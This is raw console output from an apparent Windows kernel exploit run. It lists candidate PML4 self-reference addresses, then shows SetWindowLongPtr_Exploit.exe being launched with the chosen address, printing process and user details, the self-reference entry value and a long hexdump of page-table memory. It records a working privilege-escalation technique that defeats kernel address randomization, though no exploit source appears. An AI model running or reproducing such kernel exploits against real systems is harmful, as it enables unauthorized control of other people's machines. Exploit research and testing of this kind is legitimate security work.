Left in Potential Array: ffffa9d4ea753a98
Left in Potential Array: ffffaa552a954aa0
Left in Potential Array: ffffaad56ab55aa8
Left in Potential Array: ffffab55aad56ab0
Left in Potential Array: ffffabd5eaf57ab8
Left in Potential Array: ffffac562b158ac0
Left in Potential Array: ffffacd66b359ac8
Left in Potential Array: ffffad56ab55aad0
Left in Potential Array: ffffadd6eb75bad8
Left in Potential Array: ffffae572b95cae0
Left in Potential Array: ffffaed76bb5dae8
Left in Potential Array: ffffaf57abd5eaf0
Left in Potential Array: ffffafd7ebf5faf8
Left in Potential Array: ffffb0582c160b00
Left in Potential Array: ffffb0d86c361b08
Left in Potential Array: ffffb158ac562b10
Left in Potential Array: ffffb1d8ec763b18
Left in Potential Array: ffffb2592c964b20
Left in Potential Array: ffffb2d96cb65b28
Left in Potential Array: ffffb359acd66b30
Left in Potential Array: ffffb3d9ecf67b38
Left in Potential Array: ffffb45a2d168b40
Left in Potential Array: ffffb4da6d369b48
Left in Potential Array: ffffb55aad56ab50
Left in Potential Array: ffffb5daed76bb58
Left in Potential Array: ffffb65b2d96cb60
Left in Potential Array: ffffb6db6db6db68
Left in Potential Array: ffffb75badd6eb70
Left in Potential Array: ffffb7dbedf6fb78
Left in Potential Array: ffffb85c2e170b80
Left in Potential Array: ffffb8dc6e371b88
Left in Potential Array: ffffb95cae572b90
Left in Potential Array: ffffb9dcee773b98
Left in Potential Array: ffffba5d2e974ba0
Left in Potential Array: ffffbadd6eb75ba8
Left in Potential Array: ffffbb5daed76bb0
Left in Potential Array: ffffbbddeef77bb8
Left in Potential Array: ffffbc5e2f178bc0
Left in Potential Array: ffffbcde6f379bc8
Left in Potential Array: ffffbd5eaf57abd0
Left in Potential Array: ffffbddeef77bbd8
Left in Potential Array: ffffbe5f2f97cbe0
Left in Potential Array: ffffbedf6fb7dbe8
Left in Potential Array: ffffbf5fafd7ebf0
Left in Potential Array: ffffbfdfeff7fbf8
Left in Potential Array: ffffc06030180c00
Left in Potential Array: ffffc0e070381c08
Left in Potential Array: ffffc160b0582c10
Left in Potential Array: ffffc1e0f0783c18
Left in Potential Array: ffffc26130984c20
Left in Potential Array: ffffc2e170b85c28
Left in Potential Array: ffffc361b0d86c30
Left in Potential Array: ffffc3e1f0f87c38
Left in Potential Array: ffffc46231188c40
Left in Potential Array: ffffc4e271389c48
Left in Potential Array: ffffc562b158ac50
Left in Potential Array: ffffc5e2f178bc58
Left in Potential Array: ffffc6633198cc60
Left in Potential Array: ffffc6e371b8dc68
Left in Potential Array: ffffc763b1d8ec70
Left in Potential Array: ffffc7e3f1f8fc78
Left in Potential Array: ffffc86432190c80
Left in Potential Array: ffffc8e472391c88
Left in Potential Array: ffffc964b2592c90
Left in Potential Array: ffffc9e4f2793c98
Left in Potential Array: ffffca6532994ca0
Left in Potential Array: ffffcae572b95ca8
Left in Potential Array: ffffcb65b2d96cb0
Left in Potential Array: ffffcbe5f2f97cb8
Left in Potential Array: ffffcc6633198cc0
Left in Potential Array: ffffcce673399cc8
Left in Potential Array: ffffcd66b359acd0
Left in Potential Array: ffffcde6f379bcd8
Left in Potential Array: ffffce673399cce0
Left in Potential Array: ffffcee773b9dce8
Left in Potential Array: ffffcf67b3d9ecf0
Left in Potential Array: ffffcfe7f3f9fcf8
Left in Potential Array: ffffd068341a0d00
Left in Potential Array: ffffd0e8743a1d08
Left in Potential Array: ffffd168b45a2d10
Left in Potential Array: ffffd1e8f47a3d18
Left in Potential Array: ffffd269349a4d20
Left in Potential Array: ffffd2e974ba5d28
Left in Potential Array: ffffd369b4da6d30
Left in Potential Array: ffffd3e9f4fa7d38
Left in Potential Array: ffffd46a351a8d40
Left in Potential Array: ffffd4ea753a9d48
Left in Potential Array: ffffd56ab55aad50
Left in Potential Array: ffffd5eaf57abd58
Left in Potential Array: ffffd66b359acd60
Left in Potential Array: ffffd6eb75badd68
Left in Potential Array: ffffd76bb5daed70
Left in Potential Array: ffffd7ebf5fafd78
Left in Potential Array: ffffd86c361b0d80
Left in Potential Array: ffffd8ec763b1d88
Left in Potential Array: ffffd96cb65b2d90
Left in Potential Array: ffffd9ecf67b3d98
Left in Potential Array: ffffda6d369b4da0
Left in Potential Array: ffffdaed76bb5da8
Left in Potential Array: ffffdb6db6db6db0
Left in Potential Array: ffffdbedf6fb7db8
Left in Potential Array: ffffdc6e371b8dc0
Left in Potential Array: ffffdcee773b9dc8
Left in Potential Array: ffffdd6eb75badd0
Left in Potential Array: ffffddeef77bbdd8
Left in Potential Array: ffffde6f379bcde0
Left in Potential Array: ffffdeef77bbdde8
Left in Potential Array: ffffdf6fb7dbedf0
Left in Potential Array: ffffdfeff7fbfdf8
Left in Potential Array: ffffe070381c0e00
Left in Potential Array: ffffe0f0783c1e08
Left in Potential Array: ffffe170b85c2e10
Left in Potential Array: ffffe1f0f87c3e18
Left in Potential Array: ffffe271389c4e20
Left in Potential Array: ffffe2f178bc5e28
Left in Potential Array: ffffe371b8dc6e30
Left in Potential Array: ffffe3f1f8fc7e38
Left in Potential Array: ffffe472391c8e40
Left in Potential Array: ffffe4f2793c9e48
Left in Potential Array: ffffe572b95cae50
Left in Potential Array: ffffe5f2f97cbe58
Left in Potential Array: ffffe673399cce60
Left in Potential Array: ffffe6f379bcde68
Left in Potential Array: ffffe773b9dcee70
Left in Potential Array: ffffe7f3f9fcfe78
Left in Potential Array: ffffe8743a1d0e80
Left in Potential Array: ffffe8f47a3d1e88
Left in Potential Array: ffffe974ba5d2e90
Left in Potential Array: ffffe9f4fa7d3e98
Left in Potential Array: ffffea753a9d4ea0
Left in Potential Array: ffffeaf57abd5ea8
Left in Potential Array: ffffeb75badd6eb0
Left in Potential Array: ffffebf5fafd7eb8
Left in Potential Array: ffffec763b1d8ec0
Left in Potential Array: ffffecf67b3d9ec8
Left in Potential Array: ffffed76bb5daed0
Left in Potential Array: ffffedf6fb7dbed8
Left in Potential Array: ffffee773b9dcee0
Left in Potential Array: ffffeef77bbddee8
Left in Potential Array: ffffef77bbddeef0
Left in Potential Array: ffffeff7fbfdfef8
Left in Potential Array: fffff0783c1e0f00
Left in Potential Array: fffff0f87c3e1f08
Left in Potential Array: fffff178bc5e2f10
Left in Potential Array: fffff1f8fc7e3f18
Left in Potential Array: fffff2793c9e4f20
Left in Potential Array: fffff2f97cbe5f28
Left in Potential Array: fffff379bcde6f30
Left in Potential Array: fffff3f9fcfe7f38
Left in Potential Array: fffff47a3d1e8f40
Left in Potential Array: fffff4fa7d3e9f48
Left in Potential Array: fffff57abd5eaf50
Left in Potential Array: fffff5fafd7ebf58
Left in Potential Array: fffff6fb7dbedf68
Left in Potential Array: fffff77bbddeef70
Left in Potential Array: fffff7fbfdfeff78
Left in Potential Array: fffff87c3e1f0f80
Left in Potential Array: fffff8fc7e3f1f88
Left in Potential Array: fffff97cbe5f2f90
Left in Potential Array: fffff9fcfe7f3f98
Left in Potential Array: fffffa7d3e9f4fa0
Left in Potential Array: fffffafd7ebf5fa8
Left in Potential Array: fffffb7dbedf6fb0
Left in Potential Array: fffffbfdfeff7fb8
Left in Potential Array: fffffc7e3f1f8fc0
Left in Potential Array: fffffcfe7f3f9fc8
Left in Potential Array: fffffd7ebf5fafd0
Left in Potential Array: fffffdfeff7fbfd8
Left in Potential Array: fffffe7f3f9fcfe0
Left in Potential Array: fffffeff7fbfdfe8
Left in Potential Array: ffffff7fbfdfeff0
Left in Potential Array: fffffffffffffff8
Left in Final Array: fffff67b3d9ecf60
Result: fffff67b3d9ecf60
Run SetWindowLongPtr_Exploit.exe
C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
My PID is: 6056
Current Username: qa
PML4 Self Ref: FFFFF67B3D9ECF60
Enter to continue...
Value Self Ref = 8000000100211867
000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....
000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............
000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.
000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......
000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......
000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....
000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............
000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............
000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....
000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....
000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......
000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............
000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....
000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
